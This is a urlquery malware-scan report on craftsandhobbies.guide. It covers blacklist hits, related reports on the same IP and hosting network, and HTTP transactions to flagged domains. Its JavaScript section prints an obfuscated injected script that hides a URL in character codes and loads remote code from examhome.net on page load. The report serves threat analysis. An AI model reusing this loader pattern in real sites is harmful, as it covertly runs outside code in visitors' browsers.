Overview

URL craftsandhobbies.guide/
IP74.208.236.112
ASNAS8560 1&1 Internet AG
Location United States
Report completed2019-01-14 07:48:07 CET
StatusLoading report..
urlquery Alerts No alerts detected


Settings

UserAgentMozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Pool
Access Level


Intrusion Detection Systems

Suricata /w Emerging Threats Pro  No alerts detected


Blacklists

MDL  No alerts detected
OpenPhish  No alerts detected
PhishTank  No alerts detected
Fortinet's Web Filter
Added / Verified Severity Host Comment
2019-01-14 2 craftsandhobbies.guide/ Malware
2019-01-14 2 www.learningtoolkit.club/link.php?ver=1 Malware
2019-01-14 2 www.learningtoolkit.club/link.php?ver=1 Malware
DNS-BH  No alerts detected
mnemonic secure dns  No alerts detected


Recent reports on same IP/ASN/Domain

Last 10 reports on IP: 74.208.236.112

Date UQ / IDS / BL URL IP
2019-06-18 23:01:32 +0200
0 - 0 - 0 abrahamrivera.com 74.208.236.112
2019-06-07 17:38:36 +0200
0 - 0 - 2 mindcrackers.com/templates/beez 74.208.236.112
2019-05-23 21:04:12 +0200
0 - 1 - 2 mindcrackers.com/templates/beez/voc.exe 74.208.236.112
2019-05-23 21:04:10 +0200
0 - 1 - 1 www.mindcrackers.com/templates/beez/voc.exe 74.208.236.112
2019-05-23 17:20:59 +0200
0 - 1 - 1 www.mindcrackers.com/templates/beez/ko.exe 74.208.236.112
2019-05-23 17:20:58 +0200
0 - 1 - 2 mindcrackers.com/templates/beez/ko.exe 74.208.236.112
2019-04-18 01:13:04 +0200
0 - 0 - 2 mindcrackers.com/templates/beez/voc.exe 74.208.236.112
2019-04-18 01:13:04 +0200
0 - 0 - 1 www.mindcrackers.com/templates/beez/voc.exe 74.208.236.112
2019-04-16 04:56:42 +0200
0 - 0 - 2 mindcrackers.com/templates/beez/ko.exe 74.208.236.112
2019-04-16 04:56:39 +0200
0 - 0 - 1 www.mindcrackers.com/templates/beez/ko.exe 74.208.236.112

Last 10 reports on ASN: AS8560 1&1 Internet AG

Date UQ / IDS / BL URL IP
2019-07-01 11:37:44 +0200
0 - 0 - 1 estelleabou.com/able/db/index.php 217.160.0.127
2019-06-30 22:40:38 +0200
0 - 0 - 1 bankofamericasonlinebofas.com 217.160.0.218
2019-06-30 21:10:17 +0200
0 - 0 - 0 www.plc2.de 217.160.0.93
2019-06-30 20:17:19 +0200
0 - 0 - 0 aquihaypelotas.es 217.160.0.1
2019-06-30 15:08:55 +0200
0 - 0 - 0 https://www.ionos.com/community/question/watc (...) 74.208.255.134
2019-06-30 14:54:42 +0200
0 - 0 - 0 https://www.holprop.com/list_sales_frames.asp (...) 88.208.250.232
2019-06-30 12:26:38 +0200
0 - 0 - 0 https://www.ionos.com/community/question/stre (...) 74.208.255.134
2019-06-30 04:13:33 +0200
0 - 0 - 0 https://www.ionos.com/community/question/matc (...) 74.208.255.134
2019-06-30 03:54:08 +0200
0 - 0 - 0 https://www.ionos.com/community/question/ufc- (...) 74.208.255.134
2019-06-30 03:33:19 +0200
0 - 0 - 0 https://www.ionos.com/community/question/boxi (...) 74.208.255.134

No other reports on domain: craftsandhobbies.guide



JavaScript

Executed Scripts (2)


Executed Evals (1)

#1 JavaScript::Eval (size: 619, repeated: 2) - SHA256: 4c4d6f5ed1ed72a5ec2cc0ba468013d4418664723efc64283774a25ac8a2669f

                                        var somestring = document.createElement('script');
somestring.type = 'text/javascript';
somestring.async = true;
somestring.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 101, 120, 97, 109, 104, 111, 109, 101, 46, 110, 101, 116, 47, 115, 116, 97, 116, 46, 106, 115, 63, 118, 61, 49, 46, 48, 46, 49, 48, 48);
var alls = document.getElementsByTagName('script');
var nt3 = true;
for (var i = alls.length; i--;) {
    if (alls[i].src.indexOf(String.fromCharCode(101, 120, 97, 109, 104, 111, 109, 101)) > -1) {
        nt3 = false;
    }
}
if (nt3 == true) {
    document.getElementsByTagName("head")[0].appendChild(somestring);
}
                                    

Executed Writes (0)



HTTP Transactions (4)


Request Response
                                        
                                            GET / HTTP/1.1 
Host: craftsandhobbies.guide
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

                                         
                                         74.208.236.112
HTTP/1.1 200 OK
Content-Type: text/html
                                        
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=15
Date: Mon, 14 Jan 2019 06:47:34 GMT
Server: Apache
Last-Modified: Thu, 27 Sep 2018 03:59:43 GMT
Etag: W/"23d3-576d25e761a71"
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   1772
Md5:    723130d3327d73c015cf23cbc34319d6
Sha1:   c7ae7b794de78fcf362ebc52616710cb241881b9
Sha256: d2e20b6a2d1591633710be358bad5786e2adce43ab5797272ac0412d34d5949f

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /link.php?ver=1 HTTP/1.1 
Host: www.learningtoolkit.club
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://craftsandhobbies.guide/
Origin: http://craftsandhobbies.guide

                                         
                                         0.0.0.0
                                        


--- Additional Info ---

Alerts:
  Blacklists:
    - fortinet: Malware
                                        
                                            GET /stat.js?v=1.0.100 HTTP/1.1 
Host: examhome.net
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://craftsandhobbies.guide/

                                         
                                         0.0.0.0
                                        


--- Additional Info ---
                                        
                                            GET /link.php?ver=1 HTTP/1.1 
Host: www.learningtoolkit.club
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://craftsandhobbies.guide/
Origin: http://craftsandhobbies.guide

                                         
                                         0.0.0.0
                                        


--- Additional Info ---

Alerts:
  Blacklists:
    - fortinet: Malware